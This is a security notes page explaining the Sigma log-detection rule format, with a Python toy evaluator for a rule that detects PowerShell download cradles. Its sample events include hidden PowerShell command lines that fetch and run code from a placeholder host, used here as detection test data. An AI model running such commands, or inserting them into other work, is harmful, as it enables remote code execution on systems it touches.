killchain-compendium/Miscellaneous/Threat Intelligence/Sigma Rules.md

Sigma Rules

Sigma is a generic, open signature format for log events: a detection is written once as a YAML document in an abstracted notation and then converted into the query language of the target backend (Splunk SPL, Elastic/Kibana, QRadar, Microsoft Sentinel KQL and others). It is often described as "YARA for logs": YARA plays the same role for files that Sigma plays for log events (YARA is not a conversion target).

A rule describes an indicator of compromise or a suspicious behaviour in a data format that can be shared and version-controlled.
The same rule can then be translated into tool-specific queries for many different SIEMs and log platforms, so detection logic is written once and reviewed like code.

Fields

A minimal rule should contain at least the following fields. Only title, logsource and detection are strictly required by the Sigma specification; id, status and description are strongly recommended so that rules can be tracked and shared.

  • title
  • id (UUID, generated once per rule and never reused by another rule)
  • status (experimental, test, stable, deprecated or unsupported)
  • description
  • logsource (the category, product and/or service the rule applies to, e.g. process_creation on windows)
  • detection (one or more named selections, each a map of field names to values)
  • condition (nested inside detection, combining the named selections with and, or and not, e.g. selection and not filter)

Additional fields may be

  • falsepositives (known benign sources of matches)
  • level (informational, low, medium, high or critical)
  • tags (e.g. MITRE ATT&CK references such as attack.execution)

Sigma Fields

Filters

A selection maps field names to values; suffixing the field name with a pipe and a modifier narrows how the value is matched. Matching is case-insensitive by default. Field names come from the logsource, e.g. Image, CommandLine and ParentImage for Windows process_creation events:

File|endswith
CommandLine|contains
CommandLine|startswith

Note that in Sigma rules the word filter usually refers to a named selection that is subtracted in the condition (selection and not filter) to exclude known-good matches; the pipe modifiers above refine a single field inside a selection.

Transform Modifiers

A detection selection can be refined by appending a pipe | and a modifier to the field name: contains, startswith and endswith change how the value is compared, while all changes the meaning of a list of values from "any of these" (the default) to "all of these", e.g. CommandLine|contains|all. Modifiers can be chained, with all placed last.
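
The rule layout from the Fields section and the field modifiers from the two sections above, exercised end to end, as an added example that is not from the original page and is not pySigma or sigma-cli. The rule, its UUID and the log events are constructed for this example; the evaluator is a toy that supports only contains, startswith, endswith, all and the and/or/not condition grammar, and uses the Image, CommandLine and ParentImage field names of Sigma's Windows process_creation log source:

```python
"""Toy evaluator for a Sigma-style rule (added example, not pySigma or sigma-cli)."""
import uuid

# Constructed rule, written as the dict yaml.safe_load() would return for the
# equivalent YAML document. The UUID is a placeholder made up for this example.
RULE = {
    "title": "PowerShell Download Cradle (example)",
    "id": "5b1ac2c4-2e9f-4f63-9a1b-7a1c0f6f2e11",
    "status": "experimental",
    "description": "PowerShell fetching and executing remote code in memory.",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "Image|endswith": "\\powershell.exe",
            "CommandLine|contains|all": ["DownloadString", "IEX"],  # all: AND, not OR
        },
        "filter": {"ParentImage|startswith": "C:\\Program Files\\"},
        "condition": "selection and not filter",
    },
    "falsepositives": ["Administrative scripts pulling code from an internal host"],
    "level": "high",
    "tags": ["attack.execution", "attack.t1059.001"],
}
REQUIRED = ("title", "logsource", "detection")
RECOMMENDED = ("id", "status", "description")


def validate_rule(rule):
    """Return a list of problems; an empty list means the rule is well-formed."""
    problems = [f"missing required field: {k}" for k in REQUIRED if k not in rule]
    problems += [f"missing recommended field: {k}" for k in RECOMMENDED if k not in rule]
    if "condition" not in rule.get("detection", {}):
        problems.append("detection has no condition")
    try:
        uuid.UUID(str(rule.get("id", "")))
    except ValueError:
        problems.append("id is not a UUID")
    return problems


def match_one(value, modifiers, pattern):
    """Compare one field value with one pattern; Sigma matching is case-insensitive."""
    v, p = str(value).lower(), str(pattern).lower()
    if not modifiers:
        return v == p
    if modifiers == ["contains"]:
        return p in v
    if modifiers == ["startswith"]:
        return v.startswith(p)
    if modifiers == ["endswith"]:
        return v.endswith(p)
    raise ValueError(f"unsupported modifier chain: {modifiers}")  # e.g. re, base64


def match_field(event, key, patterns):
    """Evaluate one 'Field|modifier[|all]: value(s)' entry against an event."""
    field, *modifiers = key.split("|")
    want_all = "all" in modifiers
    modifiers = [m for m in modifiers if m != "all"]
    if field not in event:
        return False
    patterns = patterns if isinstance(patterns, list) else [patterns]
    hits = [match_one(event[field], modifiers, p) for p in patterns]
    return all(hits) if want_all else any(hits)


def match_selection(event, selection):
    """All field entries inside one selection map are ANDed together."""
    return all(match_field(event, k, v) for k, v in selection.items())


def eval_condition(condition, results):
    """Recursive-descent evaluation of e.g. 'a and not (b or c)' over selection results."""
    tokens = condition.replace("(", " ( ").replace(")", " ) ").split()
    pos = 0

    def peek():
        return tokens[pos] if pos < len(tokens) else None

    def take():
        nonlocal pos
        pos += 1
        return tokens[pos - 1]

    def parse_or():
        left = parse_and()
        while peek() == "or":
            take()
            right = parse_and()  # always parse the right side, never short-circuit
            left = left or right
        return left

    def parse_and():
        left = parse_not()
        while peek() == "and":
            take()
            right = parse_not()
            left = left and right
        return left

    def parse_not():
        if peek() == "not":
            take()
            return not parse_not()
        tok = take()
        if tok == "(":
            inner = parse_or()
            if take() != ")":
                raise ValueError("unbalanced parentheses")
            return inner
        if tok not in results:
            raise ValueError(f"unknown selection name: {tok}")
        return results[tok]

    out = parse_or()
    if peek() is not None:
        raise ValueError("trailing tokens in condition")
    return out


def rule_matches(rule, event):
    det = rule["detection"]
    results = {n: match_selection(event, s) for n, s in det.items() if n != "condition"}
    return eval_condition(det["condition"], results)


PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
EVENTS = [  # constructed process_creation events; index 0 is the only true positive
    {"Image": PS, "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/a.ps1')"},
    {"Image": PS, "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell -File C:\\scripts\\backup.ps1"},  # benign
    {"Image": PS, "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "powershell -c (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/x')"},  # no IEX, |all fails
    {"Image": PS, "ParentImage": "C:\\Program Files\\Vendor\\updater.exe",
     "CommandLine": "powershell -c IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/u')"},  # removed by filter
]


def matching_events(rule, events):
    return [i for i, e in enumerate(events) if rule_matches(rule, e)]


if __name__ == "__main__":
    print(validate_rule(RULE), matching_events(RULE, EVENTS))
```

Event 2 shows why |all matters: without it the two CommandLine patterns would be ORed and the plain DownloadString call would fire the rule. Event 3 shows the filter selection being subtracted by the condition. Real converters also handle wildcards, re and base64 modifiers and the "1 of selection*" condition forms, none of which this toy implements; it raises on anything it does not understand rather than silently matching nothing.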

Tools